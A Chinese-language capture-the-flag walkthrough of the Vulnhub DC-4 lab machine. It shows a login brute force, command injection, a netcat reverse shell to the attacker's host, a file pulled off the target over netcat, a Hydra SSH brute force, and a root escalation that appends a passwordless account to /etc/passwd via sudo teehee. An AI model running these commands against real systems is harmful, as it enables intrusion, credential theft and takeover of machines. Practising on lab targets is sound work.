Vulnhub | DC4靶机 渗透测试

DC系列靶机 4/9
主要内容：burpsuite爆破登录框、抓包命令执行(RCE)、反弹shell、ssh爆破、teehee提权

官网下载地址：https://www.vulnhub.com/entry/dc-4,313/
作者主页下载地址：https://www.five86.com/dc-4.html
靶场描述：

---

---

信息收集

主机发现

arp-scan -l
192.168.1.186

---

端口扫描

nmap -sS -p- -A 192.168.1.186

扫出22和80端口

顺便用nmap自带脚本扫漏洞

nmap --script=vuln 192.168.1.186

扫出一个csrf，没啥用

看看网页，一个登录框，源码没什么

---

爆破

爆破出账号密码

admin/happy

进入后台，发现有命令执行功能

---

命令执行漏洞（RCE）

抓包改命令

whoami成功执行

---

发现用户

执行cat /etc/passwd，发现三个用户：charles、jim、sam

---

反弹shell

kali:
nc -lvnp 2333
靶机：
nc -e /bin/bash 192.168.1.101 2333

用python实现交互shell

python -c "import pty;pty.spawn('/bin/bash')"

---

到处看看

www-data@dc-4:/usr/share/nginx/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

www-data@dc-4:/usr/share/nginx/html$ ls
ls
command.php  css  images  index.php  login.php  logout.php
www-data@dc-4:/usr/share/nginx/html$ cd /home
cd /home
www-data@dc-4:/home$ ls
ls
charles  jim  sam
www-data@dc-4:/home$ ls -lah charles
ls -lah charles
total 20K
drwxr-xr-x 2 charles charles 4.0K Apr  7  2019 .
drwxr-xr-x 5 root    root    4.0K Apr  7  2019 ..
-rw-r--r-- 1 charles charles  220 Apr  6  2019 .bash_logout
-rw-r--r-- 1 charles charles 3.5K Apr  6  2019 .bashrc
-rw-r--r-- 1 charles charles  675 Apr  6  2019 .profile
www-data@dc-4:/home$ ls -lah jim
ls -lah jim
total 32K
drwxr-xr-x 3 jim  jim  4.0K Apr  7  2019 .
drwxr-xr-x 5 root root 4.0K Apr  7  2019 ..
-rw-r--r-- 1 jim  jim   220 Apr  6  2019 .bash_logout
-rw-r--r-- 1 jim  jim  3.5K Apr  6  2019 .bashrc
-rw-r--r-- 1 jim  jim   675 Apr  6  2019 .profile
drwxr-xr-x 2 jim  jim  4.0K Apr  7  2019 backups
-rw------- 1 jim  jim   528 Apr  6  2019 mbox
-rwxrwxrwx 1 jim  jim   174 Apr  6  2019 test.sh
这test.sh权限很高，不知道能不能用

www-data@dc-4:/home$ ls -lah sam
ls -lah sam
total 20K
drwxr-xr-x 2 sam  sam  4.0K Apr  7  2019 .
drwxr-xr-x 5 root root 4.0K Apr  7  2019 ..
-rw-r--r-- 1 sam  sam   220 Apr  6  2019 .bash_logout
-rw-r--r-- 1 sam  sam  3.5K Apr  6  2019 .bashrc
-rw-r--r-- 1 sam  sam   675 Apr  6  2019 .profile
www-data@dc-4:/home$ cat jim/mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
        (envelope-from <root@dc-4>)
        id 1hCiQe-0000gc-EC
        for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO

This is a test.
www-data@dc-4:/home$ ls -lah jim/backups
ls -lah jim/backups
total 12K
drwxr-xr-x 2 jim jim 4.0K Apr  7  2019 .
drwxr-xr-x 3 jim jim 4.0K Apr  7  2019 ..
-rw-r--r-- 1 jim jim 2.0K Apr  7  2019 old-passwords.bak
发现疑似可用信息

把old-passwords.bak传出来

kali
nc -lvnp 2334 > old-passwords.txt
靶机
nc 192.168.1.101 2334 < jim/backups/old-passwords.bak

---

hydra爆ssh密码

通过上一部得到的字典是在jim目录下发现的，就用来爆破jim吧

hydra -l jim -P old-passwords.txt ssh://192.168.1.186

get

jim/jibril04

ssh登录

---

得到另一个密码

差点忽略提示：You have mail.

jim@dc-4:~$ cd /var/mail
jim@dc-4:/var/mail$ ls
jim
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
        (envelope-from <charles@dc-4>)
        id 1hCjIX-0000kO-Qt
        for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles

得到用户Charles的密码^xHhA&hvim0y

---

提权

切换用户，sudo -l发现提示：teehee命令可无密码以root权限执行


可以用来写入文件，-a参数可以附加不覆盖

echo "test1::0:0:root:/root:/bin/bash"|sudo teehee -a /etc/passwd
第2列为空，无密码，root权限

get root权限

---

flag

root@dc-4:/home/charles# cat /root/flag.txt



888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.

---

总结

扫端口记录下来
burpsuite爆破登录账户密码
burpsuite改包命令执行，nc 反弹shell
到处看看有没有可利用的
拿到字典hydra爆ssh
邮箱找到另一个账号密码
找到无密码执行root权限的命令teehee
用teehee创建root权限无密码用户
得到最高权限的用户
get flag

---

彩蛋

www-data@dc-4:/home$ cat jim/test.sh
cat jim/test.sh
#!/bin/bash
for i in {1..5}
do
 sleep 1
 echo "Learn bash they said."
 sleep 1
 echo "Bash is good they said."
done
 echo "But I'd rather bash my head against a brick wall."

---

以上